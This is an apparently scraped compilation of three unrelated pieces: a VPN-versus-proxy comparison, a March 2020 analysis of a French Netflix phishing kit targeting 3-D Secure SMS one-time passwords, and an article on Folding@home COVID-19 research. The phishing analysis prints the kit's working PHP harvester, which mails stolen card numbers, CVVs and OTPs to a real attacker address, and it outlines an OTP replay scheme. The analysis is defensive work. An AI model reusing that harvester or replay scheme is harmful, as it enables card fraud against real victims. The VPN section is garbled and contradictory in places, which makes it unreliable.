VPN also providing the high-level anonymity and encrypt the user’s request that passed through a various remote server that makes impossible to track back to you.
The organization is running its internal networks on a proxy server to control internet usage and prevent inappropriate site usage on the internal networks.
VPN Bypass Internet Censorship and let you access anything you want to access on the internet and complete away your acclivities from government and law enforcement agencies.
Proxies servers are providing Extreme Protection from hackers while using public Wi-Fi, and break the censored websites.
VPN’s are slower because of the encryption, while proxy servers are faster since Proxies do not encrypt the traffic between the internet and the user’s device.
VPN let allow you access the corporate network securely from outside internet Connectivity such as hotel, coffee shop, etc.
If you don’t have any corporate VPN then proxies are providing alternative access with high security also it provides very easy to access the client software.
VPN provides a high-security future to access the Secures Apps and Desktop/Laptop Programs but proxies are not much familiar with this case.
Proxies don’t use any tunneling operation but the proxy server is a great way to add a layer between your enterprise and the Internet
VPN Provides tunneled connections when the data send privately over the internet packet gives a layer of security that guards the substance against general visibility.
VPNs are best for…

VPNs secure your data from prying eyes, everyone from hackers to government officials using VPN services to protect the personal data. It enables users to send and receive data and remain anonymous on the Internet.

Most VPNs offer multiple concurrent connections so that the users can connect all the devices in the household to the VPN.

With the VPN all your traffic passes through a tunneled network, so even the ISP cannot see the traffic that goes with the tunnel network.

If you are an employee you can connect with your office network securely via Smartphone, tablet, and computer through a VPN.
VPN is best for protecting valuable information online.
It enables to safely shop online with Credit cards.
Enables you to browse safely with public Wi-Fi Hotspots.
By having a VPN you can reach out to your favorite movie sites, even though it blocked in your country.
With the VPN user’s ca Bypass the Web Censorship and Content Surveillance.
VPN enables you to establish communication between sites securely.
Some of the VPN providers do offer the Ad blockers as well.
Protects while logged in with the torrent sites.
With the VPN in place, you can access the websites that blocked geographically.
VPNs provide integrity, which ensures the packet is not altered when it is in transit.
A VPN anonymize would allow Peer-to-peer file-sharing which is blocked in many countries.

To say technically VPN is a wide area network that retains the functionality and the security as in the private network. These are the main uses of the VPN and the usage varies depends on the user requirements.
VPNs are not for..
VPNs may slow down the Internet Connection

You may experience a drop in speed with your internet connection when routed through VPN due to its high-quality 256-bit encryption. Sometimes VPN connection it may slow down the internet speed if too many users active in the server.

Generally, the VPN speed depends upon your internet speed, if you are in India and using a VPN server in the USA then your connection tunnel over a number of endpoints which may slow down the connection. So it is recommended users not to use the VPN wisely.
I’m under a VPN, so I can do anything online

If you are under VPN then we can’t say you are 100% anonymous, the VPN provider can see your access logs and they would hold the log’s for a period of at least 6 months based on the country location.

All the VPNs are not the same and there are a number of factors that are to be considered in classifying them based on need, supported platforms, the number of available servers.

Also, users should aware that VPNs would not secure you from Phishing or from the malware and ransomware attacks.

You can get the Free VPN, but the connection would be terrible and it suffers severely with the limitations on low bandwidth and some providers even sell your private data.
Proxies are best for…

Proxies are widely used to bypass the blocked websites in the ISP or the organization levels.

Proxy servers used in the corporate environments to shield their internal network infrastructure.

The Proxies contains a very good cache mechanism, so it can be used to speed up the browsing process.

It hides your original IP address and shows the spoofing IP address, so the destination website cannot read your original IP.

The proxy makes you remain anonymous online, but it will not encrypt the traffic as like the VPN.

With some of the proxies you can get double protection as they do have the firewall inbuilt that stops the intrusions.

Servers administrators can use proxy servers to block websites associated to social networking, gaming, adult sites for employees in the organization.

There are thousands of free and paid proxy available on the Internet, choosing a proxy you should carefully consider the downtime.

With the help of the proxy servers, one can reach to the websites that have been blocked geographically.

Implementation of the proxy is very simple and the proxies are so confined with the browsers. Some of the premium proxies would save companies bandwidth.
Proxies are not for…

The proxy servers are not secure for email communication and file transfer protocols and the proxy servers are good only for web communication.

It is less secure than storing all the user passwords in active directory, They are not compatible with all the network protocols.

With the proxy firewalls, the configuration is very difficult when compared to other modern days firewalls.

If the proxy server is compromised then there is a chance for identity theft, then you should avoid entering bank login credentials when connected through a proxy server.

The Proxy server administrator can sniff out all the details that are traveling through the server and also they are poor in handling things such as Flash, Java, and JavaScript scripts.

Proxy servers have some serious security disadvantages if the single port left open with the proxy server and then attackers can enumerate with it.

If there is an issue in establishing a connection then with the proxy server it is hard to troubleshoot and they are not compatible with all the network protocols.

We already discussed the cache increases the speed, but on the other hand, there are some disadvantages. The cache displays the display of the old contents.

Not all the proxies are good, you should spend a lot of time to find a right proxy. A good proxy chain only provides better performance.
Conclusion

Simply both the proxy and VPN were made to hide the internet traffic and with the VPN the traffic will be passed through a network tunnel, but the low-quality VPNs would expose serious threats.

The proxy servers are very hard to set up and they won’t encrypt the data, using a VPN and proxy can slow down the connection dramatically. When it comes to the encryption VPNs are the best and they offer encryption with industry standard keysize.

One should be very careful in picking a proxy server because attackers also do run the proxy servers to sniff the network traffic.

When it comes to a proxy, you can hide only the HTTP traffic, but with VPNs, you can hide the traffic sent through all the protocols.

If you are to compare VPN and Proxy which is better, it completely depends on your requirement. It doesn’t matter if you pick to use a proxy server or the VPN, but need to ensure the service you selected may solve the requirement

Monday, March 9, 2020

3-D Secure SMS-OTP Phishing



One of our remediation analysts Eli Trevino recently discovered a phishing page informing victims about fake Netflix service disruptions, supposedly due to problems with the victim’s payment method.

The phishing page prompts victims to provide their payment details to prevent account lockout:



What’s interesting about this phishing page is that it selectively targets victims within a specific geographic region: France. The attackers use French for the page content, and the country calling code is default set to 33 which is designated for calls made to France.
3-D Secure

The phishing campaign is specifically targeting payment cards using the 3-D Secure system, which was created by the largest payment card companies to combat online fraudulent CNP (card not present) transactions.

The latest iteration, 3-D Secure 2.0, now requires the use of a dynamic SMS OTP (one-time password) which is sent to the card owner’s registered mobile number. This SMS OTP used by banks for authenticating online purchases is also referred to as a mobile transaction authentication number (mTAN).

Before this functionality was implemented, card owners would have to use the static PIN code that was assigned to them during the card’s activation — but these static PIN codes were vulnerable to theft and made it easy for attackers to authenticate, once the static PIN code was known.

3-D Secure 2.0 uses a SMS OTP so that users don’t need to remember or store passcodes as they previously did with the static PIN. Instead, they just need to access their mobile SIM card to receive the OTP via SMS.

This SMS OTP feature forces thieves to find a way to acquire or bypass the OTP passcode, so they can fraudulently use the stolen payment card data. To accomplish this, the attackers have included a second step in their phishing campaign which prompts the victim to submit their SMS OTP passcode.



Once a victim has submitted all of their information and authenticated the OTP, the payment data is sent to an email address controlled by the attacker. It is also logged to a specified .txt file on the compromised website hosting the phishing page. Victims are simply redirected to the homepage of Netflix after they press the Confirmer button on the final step.
-------------------------------------------------------------------------------
session_start(); $ip = getenv("REMOTE_ADDR"); $hostname = gethostbyaddr($ip); $bilsmg .= "sms 2 : ".$_POST['otp']."\n"; $bilsmg .= "sms 1 : ".$_POST['sms1']."\n"; $bilsmg .= "------------------------------------------------------\n"; $bilsmg .= "N-Phone : ".$_POST['tel']."\n"; $bilsmg .= "E-mail : ".$_POST['email']."\n"; $bilsmg .= "C-Number : ".$_POST['cc']."\n"; $bilsmg .= "D-Expiration : ".$_POST['expe']."\n"; $bilsmg .= "CVN : ".$_POST['cvv']."\n"; $bilsmg .= "--------------------------------------------------------\n"; $bilsmg .= "From : $ip \n"; $bilsub = "Full Infos sms2 - ".$ip; $bilhead = "From: [redacted] <Amret@localhost.ma>"; mail("spampassitusaispas@protonmail.ch",$bilsub,$bilsmg,$bilhead); $file = fopen("../CC-720088888803.txt", 'a'); fwrite($file, $bilsmg); header("location: https://www.netflix.com/");
-------------------------------------------------------------------------------
Problems with Specific ACS Implementations of OTP over SMS

I was initially confused ― I didn’t understand how the attackers were planning on using the stolen OTP and payment card data. I thought the generated SMS with the OTP would be limited to the single transaction and merchant making the request to the 3DS Access Control Server.

Then, I came across this post that was able to confirm that the SMS OTP process is not necessarily standardized across 3DS ACS providers. Moreover, the post referenced a serious issue that could be abused by attackers for specific 3DS ACS providers with these characteristics:
The SMS OTP is generated from the payment card number only and not other inputs like merchant ID
The generated SMS OTP remains valid for 180 seconds (time)
OTP Replay Attack Scenario

These features allow for an OTP replay attack to be performed by the attacker. A typical scenario might follow steps along these lines:
Victim receives fraudulent phishing email regarding a popular service like Netflix or Spotify being limited due to a payment issue.
Victim loads the phishing page requesting their information and payment data and submits the information to the attacker. The phishing page informs the victim that a SMS containing a passcode will arrive soon.
During this time, the attacker’s tools use the submitted payment and personal information to immediately initiate a transaction with the merchant brand used in the phishing campaign (e.g Netflix).
The initiated transaction causes an SMS with the 3DS OTP passcode to be sent to the victim’s phone. The victim submits the OTP passcode to the phishing page and is eventually redirected to the impersonated brand (e.g Netflix).
The attacker now has a limited window of time to reuse the SMS OTP passcode and make a fraudulent purchase with the phished payment card data. The SMS OTP is considered already authenticated, so it won’t matter if the merchant and/or transaction price is the same as the initial transaction.A generated .txt file within the phishing kit that contains the phished details
The Problem: OTP Generation from Payment Card Numbers

The main problem here is that the SMS OTP is not being uniquely generated for each transaction. Instead, it is generated from the payment card’s number, allowing this window where the stolen payment card data can be reused at another merchant defined by the attacker.

Website owners can detect phishing pages and other malware with a file monitoring service, like our server side scanner, which regularly detects changes made to your website files.

Folding@Home Wants Your CPU Cycles for Coronavirus Research



By Lawrence Abrams BleepingComputer.com

March 9, 2020 01:36 PM 0






The Folding@home distributed computing project is now utilizing donated CPU cycles to research the Coronavirus (COVID-19) virus.

Folding@home is a project founded by Pande Lab at Stanford University where users donate CPU cycles through a software client to simulate protein folding, computational drug design, and other types of molecular dynamics to learn more about diseases and how to protect against them.

At the end of February, the Folding@home project announced that they are joining other COVID-19 researchers around the world to learn more about the virus and create potential drug therapies.

"By downloading Folding@Home, you can donate your unused computational resources to the Folding@home Consortium, where researchers working to advance our understanding of the structures of potential drug targets for 2019-nCoV that could aid in the design of new therapies. The data you help us generate will be quickly and openly disseminated as part of an open science collaboration of multiple laboratories around the world, giving researchers new tools that may unlock new opportunities for developing lifesaving drugs," the Folding@home project stated in a blog post.

If you have a computer laying around not doing anything or want to donate your active computer's idle CPU processing power to researching the COVID-19 virus, you can do so by downloading and installing the Folding@home client.

Once installed, right-click on the Folding@home icon in your Windows system tray to configure how much CPU power you wish to donate. The intensity of your CPU utilization can be set to 'Full', 'Medium', or 'Light', with Light being the lightest CPU load.
Folding@home options

If you plan on using your computer while donating cycles, I recommend you select the 'Light' option.

If you want to control Folding@home using a web interface, you can select the 'Web Control' option as shown in the image above. This will open a web page showing your current work-in-progression, your settings, and the project you are contributing are your CPU cycles to.
Folding@Home

If you are configured to support research fighting 'Any Disease' then your CPU cycles will be randomly select among different projects, including Coronavirus/COVID-19 research.

You can determine what project you are contributing to by looking at the project number and looking it up here.

If you are contributing to projects 11741, 11742, or 11743 then your donated CPU cycles are being used for Coronavirus research.

H/T Rob Joyce